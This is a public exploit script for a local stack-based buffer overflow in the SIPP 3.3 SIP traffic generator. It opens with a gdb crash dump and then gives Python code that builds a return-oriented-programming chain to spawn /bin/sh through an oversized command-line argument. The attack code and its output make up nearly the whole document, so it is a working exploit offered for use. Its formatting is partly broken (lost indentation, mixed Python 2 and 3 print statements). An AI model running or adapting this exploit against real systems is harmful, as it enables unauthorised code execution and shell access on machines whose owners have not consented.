1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131 | # Exploit Author: Juan Sacco <jsacco@exploitpack.com> - http://exploitpack.com
#
# Tested on: Kali i686 GNU/Linux
#
# Description: SIPP 3.3 is prone to a local unauthenticated stack-based overflow
# The vulnerability is due to an unproper filter of user suppliedinput while reading
# the configuration file and parsing the malicious crafted value.
#
# Program: SIPP 3.3 Traffic generator for the SIP protocol
# SIPp is a free Open Source test tool / traffic generator
# for the SIP protocol. Filename: pool/main/s/sipp/sipp_3.3-1kali2_i386.deb
#
# Vendor: http://sipp.sourceforge.net/
# gdb-peda$ checksec
# CANARY : disabled
# FORTIFY : disabled
# NX : ENABLED
# PIE : ENABLED
# RELRO : Partial
#
#[----------------------------------registers-----------------------------------]
# EAX: 0x41414141 ('AAAA')
# EBX: 0x25 ('%')
# ECX: 0xb7c9e340 --> 0x4cf8b0 ('A' <repeats 200 times>...)
# EDX: 0xb7c9e200 --> 0x0
# ESI: 0xb7ca0748 --> 0x0
# EDI: 0x0
# EBP: 0xbfffc898 --> 0xbfffc8c8 --> 0xbfffc8e8 --> 0xbfffc908 -->0xb7c9d000 --> 0x1d4d6c
# ESP: 0xbfffc898 --> 0xbfffc8c8 --> 0xbfffc8e8 --> 0xbfffc908 -->0xb7c9d000 --> 0x1d4d6c
# EIP: 0x43cdcf (mov eax,DWORD PTR [eax+0xc])
# EFLAGS: 0x10216 (carry PARITY ADJUST zero sign trap INTERRUPTdirection overflow)
# [-------------------------------------code-------------------------------------]
# 0x43cdc2: call 0x4053e6
# 0x43cdc7: add eax,0x50239
# 0x43cdcc: mov eax,DWORD PTR [ebp+0x8]
# => 0x43cdcf: mov eax,DWORD PTR [eax+0xc]
# 0x43cdd2: pop ebp
# 0x43cdd3: ret
# 0x43cdd4: push ebp
# 0x43cdd5: mov ebp,esp
# [------------------------------------stack-------------------------------------]
# 0000| 0xbfffc898 --> 0xbfffc8c8 --> 0xbfffc8e8 --> 0xbfffc908 -->0xb7c9d000 --> 0x1d4d6c
# 0004| 0xbfffc89c --> 0x43c159 (add esp,0x10)
# 0008| 0xbfffc8a0 ("AAAA\377\377\377\377\310\310\377\277C\301C")
# 0012| 0xbfffc8a4 --> 0xffffffff
# 0016| 0xbfffc8a8 --> 0xbfffc8c8 --> 0xbfffc8e8 --> 0xbfffc908 -->0xb7c9d000 --> 0x1d4d6c
# 0020| 0xbfffc8ac --> 0x43c143 (add eax,0x50ebd)
# 0024| 0xbfffc8b0 --> 0x597ba0 --> 0x0
# 0028| 0xbfffc8b4 --> 0xffffffff
# [------------------------------------------------------------------------------]
# Legend: code, data, rodata, value
# Stopped reason: SIGSEGV
# 0x41414141 in ?? ()
import os, subprocess
from struct import pack
# rop execve ( bin/sh )
rop = "A"*2208 # junk
rop += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop edi; pop ebp ; ret
rop += pack('<I', 0x0811abe0) # @ .data
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x0807b744) # pop eax ; ret
rop += '/bin'
rop += pack('<I', 0x0810ae08) # mov dword ptr [edx], eax ; pop ebx ;pop ebp ; ret
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; popedi ;pop ebp ; ret
rop += pack('<I', 0x0811abe4) # @ .data + 4
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x0807b744) # pop eax ; ret
rop += '//sh'
rop += pack('<I', 0x0810ae08) # mov dword ptr [edx], eax ; pop ebx ;pop ebp ; ret
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop edi; pop ebp ; ret
rop += pack('<I', 0x0811abe8) # @ .data + 8
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x080b4970) # xor eax, eax ; pop esi ; pop ebp ; ret
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x0810ae08) # mov dword ptr [edx], eax ; pop ebx ;pop ebp ; ret
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x080dcf4b) # pop ebx ; pop esi ; pop edi ; ret
rop += pack('<I', 0x0811abe0) # @ .data
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x08067b43) # pop ecx ; ret
rop += pack('<I', 0x0811abe8) # @ .data + 8
rop += pack('<I', 0x080e9101) # pop edx ; pop ebx ; pop esi ; pop edi; pop ebp ; ret
rop += pack('<I', 0x0811abe8) # @ .data + 8
rop += pack('<I', 0x0811abe0) # padding without overwrite ebx
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x080b4970) # xor eax, eax ; pop esi ; pop ebp ; ret
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x41414141) # padding
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080e571f) # inc eax ; ret
rop += pack('<I', 0x080c861f) # int 0x80
try:
print("[*] SIPP 3.3 Buffer Overflow by Juan Sacco")
print("[*] Please wait.. running")
subprocess.call(["sipp ", rop])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "SIPP not found!"
else:
print "Error executing exploit"
raise
|